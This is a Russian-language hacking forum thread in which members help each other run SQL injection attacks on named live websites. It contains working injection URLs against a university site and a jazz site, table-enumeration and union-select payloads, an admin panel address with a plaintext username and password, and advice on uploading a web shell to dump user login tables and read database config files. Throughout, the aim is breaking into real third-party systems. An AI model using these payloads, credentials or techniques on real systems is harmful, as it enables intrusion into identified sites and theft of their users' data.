Друзья, я был некорректен, версия 4.1.* (information_schema - нет) при попытке подбирать имя таблицы "TEST" сайт отвечает что не может найти таблицу "ABC.TEST". вопрос был как раз про этот суффикс. а еще подскажите как мне поможет шелл в добывании списка loginass пользователей сайта
Послушай ты чем читаешь? Тебе выше уже ответили, что не префикс это и не суффикс и не что то еще, это БД abc и в ней нет твоей таблицы!!!!!!!
Всё зависит от прав ... Например если есть возможность прочитать файл конфига бд или сценарий имеющий в себе конф данные,появиться возможность попасть в бд сайта... Это только один из примеров.
Товарищ, это не суффикс, а имя базы, в которой находится таблица, из которой mysql пытается получить данные по твоему запросу. Если он так отвечает, значит такой таблицы в данной базе не существует. Подбирай дальше, пробуй другие имен таблиц – users, user, members, admin и тп Хорошо поможет. Можно даже сказать все сам сделает за тебя =) Сливай нужные таблицы через шелл Ох как же вы задолбали своими загадками... Уважаемые, вся необходимая теория имеется в статьях и мануалах. А если вы тут вопрос задаете по конкретной уязвимости, то будьте добры ПОСТИТЬ ССЫЛКУ. Скоро мы тут все телепатами станем... Спасибо за внимание
самое интересное что после определенного интервала времени во всю трахая мозги, обычно выкладывают урлу. З.Ы. Я думаю что у нас jokester полутелепат))
Вот скуля с таблицами.............. http://www.columbiasouthern.edu/facesofcsu/index.asp?id=-1'+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('CourseInformation','Testimonials' ,'Corp_partner','States','Countries','Ad_Codes','AdminUsers','Affiliates','AppOnline','carthead','cartrows','CartRo wsOptions','Categories','Categories_Products','classes','classes_and_text','Corp_partner_description','Corp_pa rtner_featured','Counselor','customer','D99_REG','D99_Tmp','DiscOrder','DiscProd','dtproperties','EnrollmentSe ssion','Faces','Faculty','FORUM_A_REPLY'))-- http://www.columbiasouthern.edu/admin/ Username:admin Password:csupride12 Как сюда шелл залить? ) Блин........может где нибудь ещё админка есть?
А сорри, не так понял, пока не вижу, ничего загружать не даёт, сплошной html какой-то, надо думать. Aктивку можно понятно впихать, но неинтересно
Здрацте , приятного времени сутак. Ближе к делу . 3 стоплца . ht_tp://www.tsfjazz.com/podcast-detail.php?id=3+group+by+3+-- но ht_tp://www.tsfjazz.com/podcast-detail.php?id=3+union+select+1,2,3+-- неправленое количество стоплцоф Што мозно исправьте или где об етом поподробнее
Сначала подбери кол-во полей через order+by+..., т.е. order+by+1 -ошибка? значит больше, и так д минимального числа пока нету ошибки) А вообще почитай темы про SQL-inj - там лучше написано
2 попугай Видел што советавали ползоваца group а не order но не ветом дело . 2 Tigger Ето я знаю , видемо изменение в тексте ошибки ,можно взят как ответ ... Вот и ответил сам на свои вопрос )
ниатдам вам урл, хочу сам добить.(+урл в паблике вызовет фикс бага) запрос: '+AND+1=(SELECT+name+LIMIT+0,1)/* Column 'name' in field list is ambiguous - что это значит?(перевел, все равно не понятно как боротся с неоднозначностью???)